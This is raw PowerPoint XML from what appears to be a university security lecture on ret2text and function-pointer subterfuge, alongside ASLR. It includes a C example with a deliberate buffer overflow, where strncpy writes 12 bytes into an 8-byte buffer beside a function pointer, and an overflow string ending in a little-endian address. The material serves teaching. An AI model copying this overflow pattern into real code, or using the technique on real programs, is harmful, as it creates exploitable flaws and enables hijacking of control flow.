        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> section has executable program code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>but not typically randomized by ASLR except PIE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>can hijack control flow to unintended (but existing) program </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>function</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="45834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a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>ret2text</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28674" name="Content Placeholder 7" descr="ret2text.pdf"/>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666810" y="1600200"/>
            <a:ext cx="4884738" cy="4532313"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28675" name="Picture 9" descr="Screen shot 2010-03-01 at 12.38.27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41938" y="1858963"/>
            <a:ext cx="3429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6" name="Rounded Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5362575" y="1893888"/>
            <a:ext cx="1617663" cy="339725"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00">
              <a:alpha val="30196"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="20000" dir="5400000" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="37999"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Calibri" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="-239813" y="3949490"/>
            <a:ext cx="3101029" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="300" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AAAAAAAAAAAA</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" spc="300" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1031423" y="2135931"/>
            <a:ext cx="2548455" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>\x04\x85\x04\x08</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>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14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rounded Rectangular Callout 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6019800" y="762000"/>
            <a:ext cx="2286000" cy="838200"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -21283"/>
              <a:gd name="adj2" fmla="val 68561"/>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.text not randomized</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="218624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Function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Pointer Subterfuge </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
              <a:latin typeface="Calibri" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="1600200"/>
            <a:ext cx="3581400" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Overwrite a function pointer to point to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>program function (similar to ret2text)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>another lib function in Procedure Linkage Table</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4343400" y="1771059"/>
            <a:ext cx="4499699" cy="4247317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>/*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>please</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> call me!*/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> secret(char *input) { … }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>chk_pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>intput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>) { … }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> main(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[]) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> (*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)(char *input);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[8];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t> = &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>chk_pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[1], 12);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>("[] Hello %s!\n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="984807"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="984807"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ptr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="984807"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>)(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="984807"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="984807"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[2]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="415757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a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>Pointers</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
              <a:latin typeface="Calibri" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32770" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Calibri" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Calibri" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="Calibri" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
              <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32771" name="Picture 3" descr="funcptr.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7725" y="1687513"/>
            <a:ext cx="4032250" cy="443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72" name="Picture 5" descr="Screen shot 2010-03-01 at 12.50.14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51438" y="4514850"/>
            <a:ext cx="2984500" cy="1130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73" name="Picture 6" descr="Screen shot 2010-03-01 at 12.50.47 P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51438" y="2149475"/>
            <a:ext cx="3378200" cy="179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4" name="Rounded Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5162550" y="2160588"/>
            <a:ext cx="1582738" cy="327025"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00">
              <a:alpha val="30196"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="20000" dir="5400000" rotWithShape="0">
              <a:srgbClr val="808080">
                <a:alpha val="37999"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
